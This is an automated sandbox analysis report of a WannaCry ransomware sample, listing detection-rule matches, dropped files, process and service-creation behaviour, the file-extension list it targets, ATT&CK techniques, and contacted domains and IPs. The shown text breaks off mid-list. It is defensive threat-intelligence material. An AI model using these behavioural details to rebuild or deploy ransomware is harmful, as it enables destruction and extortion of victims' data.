                Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPEMatched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
                Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000002.00000000.355218955.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: C:\Users\user\Desktop\stN592INV6.exeFile created: C:\WINDOWS\tasksche.exeJump to behavior
                Source: C:\Windows\tasksche.exeCode function: 2_2_00406C402_2_00406C40
                Source: C:\Windows\tasksche.exeCode function: 2_2_00402A762_2_00402A76
                Source: C:\Windows\tasksche.exeCode function: 2_2_00402E7E2_2_00402E7E
                Source: C:\Windows\tasksche.exeCode function: 2_2_0040350F2_2_0040350F
                Source: C:\Windows\tasksche.exeCode function: 2_2_00404C192_2_00404C19
                Source: C:\Windows\tasksche.exeCode function: 2_2_0040541F2_2_0040541F
                Source: C:\Windows\tasksche.exeCode function: 2_2_004037972_2_00403797
                Source: C:\Windows\tasksche.exeCode function: 2_2_004043B72_2_004043B7
                Source: C:\Windows\tasksche.exeCode function: 2_2_004031BC2_2_004031BC
                Source: stN592INV6.exeStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: tasksche.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
                Source: Joe Sandbox ViewDropped File: C:\Windows\tasksche.exe 2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
                Source: stN592INV6.exeReversingLabs: Detection: 100%
                Source: C:\Users\user\Desktop\stN592INV6.exeFile read: C:\Users\user\Desktop\stN592INV6.exeJump to behavior
                Source: C:\Users\user\Desktop\stN592INV6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\stN592INV6.exe C:\Users\user\Desktop\stN592INV6.exe
                Source: unknownProcess created: C:\Users\user\Desktop\stN592INV6.exe C:\Users\user\Desktop\stN592INV6.exe -m security
                Source: C:\Users\user\Desktop\stN592INV6.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
                Source: C:\Users\user\Desktop\stN592INV6.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
                Source: C:\Users\user\Desktop\stN592INV6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: classification engineClassification label: mal100.rans.troj.expl.evad.winEXE@4/1@2/100
                Source: C:\Users\user\Desktop\stN592INV6.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
                Source: C:\Users\user\Desktop\stN592INV6.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
                Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,2_2_00401CE8
                Source: C:\Users\user\Desktop\stN592INV6.exeCode function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
                Source: C:\Users\user\Desktop\stN592INV6.exeCode function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,1_2_00408090
                Source: C:\Users\user\Desktop\stN592INV6.exeCode function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
                Source: C:\Users\user\Desktop\stN592INV6.exeCode function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,0_2_00407CE0
                Source: tasksche.exe, 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp, stN592INV6.exe, tasksche.exe.0.drBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
                Source: C:\Users\user\Desktop\stN592INV6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\stN592INV6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\stN592INV6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\stN592INV6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: stN592INV6.exeStatic file information: File size 3751936 > 1048576
                Source: stN592INV6.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x362000
                Source: C:\Windows\tasksche.exeCode function: 2_2_00407710 push eax; ret 2_2_0040773E
                Source: C:\Windows\tasksche.exeCode function: 2_2_004076C8 push eax; ret 2_2_004076E6
                Source: stN592INV6.exeStatic PE information: section name: metjdhr
                Source: C:\Windows\tasksche.exeCode function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00401A45

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\Desktop\stN592INV6.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
                Source: C:\Users\user\Desktop\stN592INV6.exeFile created: C:\Windows\tasksche.exeJump to dropped file
                Source: C:\Users\user\Desktop\stN592INV6.exeFile created: C:\Windows\tasksche.exeJump to dropped file
                Source: C:\Users\user\Desktop\stN592INV6.exeCode function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
                Source: C:\Users\user\Desktop\stN592INV6.exe TID: 6076Thread sleep count: 99 > 30Jump to behavior
                Source: C:\Users\user\Desktop\stN592INV6.exe TID: 6088Thread sleep count: 115 > 30Jump to behavior
                Source: C:\Users\user\Desktop\stN592INV6.exeLast function: Thread delayed
                Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000000.00000002.359491609.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000001.00000002.619089050.0000000000C12000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000001.00000002.619089050.0000000000C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\tasksche.exeCode function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00401A45
                Source: C:\Windows\tasksche.exeCode function: 2_2_004029CC free,GetProcessHeap,HeapFree,2_2_004029CC
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Service Execution
                4
                Windows Service
                4
                Windows Service
                12
                Masquerading
                1
                Input Capture
                1
                Network Share Discovery
                Remote Services1
                Input Capture
                Exfiltration Over Other Network Medium22
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts1
                Native API
                Boot or Logon Initialization Scripts1
                Process Injection
                1
                Virtualization/Sandbox Evasion
                LSASS Memory111
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                Exfiltration Over Bluetooth11
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Process Injection
                Security Account Manager1
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Obfuscated Files or Information
                NTDS1
                Remote System Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer3
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                System Information Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                stN592INV6.exe100%ReversingLabsWin32.Ransomware.WannaCry
                stN592INV6.exe100%AviraTR/AD.WannaCry.sewvt
                stN592INV6.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Windows\tasksche.exe100%AviraTR/AD.WannaCry.sewvt
                C:\Windows\tasksche.exe100%Joe Sandbox ML
                C:\Windows\tasksche.exe98%ReversingLabsWin32.Ransomware.WannaCry
                SourceDetectionScannerLabelLinkDownload
                2.2.tasksche.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                0.2.stN592INV6.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                0.0.stN592INV6.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                1.0.stN592INV6.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                0.2.stN592INV6.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                0.0.stN592INV6.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                1.2.stN592INV6.exe.24fc8c8.9.unpack100%AviraTR/Ransom.GenDownload File
                1.0.stN592INV6.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                2.0.tasksche.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                1.2.stN592INV6.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                1.2.stN592INV6.exe.252e96c.6.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                1.2.stN592INV6.exe.1fdc084.5.unpack100%AviraTR/Ransom.GenDownload File
                1.2.stN592INV6.exe.200e128.3.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                1.2.stN592INV6.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com100%URL Reputationmalware
                https://www.kryptoslogic.com0%URL Reputationsafe
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/100%URL Reputationmalware
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer100%URL Reputationmalware
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ0%URL Reputationsafe
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/&h100%Avira URL Cloudmalware
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comx86)0%Avira URL Cloudsafe
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comTERNAME0%Avira URL Cloudsafe
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/2h100%Avira URL Cloudmalware
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/L100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                104.16.173.80
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/true
                  • URL Reputation: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comstN592INV6.exetrue
                  • URL Reputation: malware
                  unknown
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comx86)stN592INV6.exe, 00000001.00000002.619089050.0000000000C07000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  low
                  https://www.kryptoslogic.comstN592INV6.exe, 00000000.00000002.359491609.0000000000B02000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: safe
                  unknown
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/&hstN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/LstN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwerstN592INV6.exe, 00000000.00000002.359491609.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  unknown
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comTERNAMEstN592INV6.exe, 00000001.00000002.619089050.0000000000C07000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/2hstN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJstN592INV6.exe, 00000001.00000002.618210719.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  107.165.99.30
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  101.159.172.21
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  115.175.192.97
                  unknownChina
                  7497CSTNET-AS-APComputerNetworkInformationCenterCNfalse
                  109.14.118.118
                  unknownFrance
                  15557LDCOMNETFRfalse
                  107.165.99.38
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.37
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.36
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.35
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.34
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  100.150.236.25
                  unknownUnited States
                  21928T-MOBILE-AS21928USfalse
                  107.165.99.33
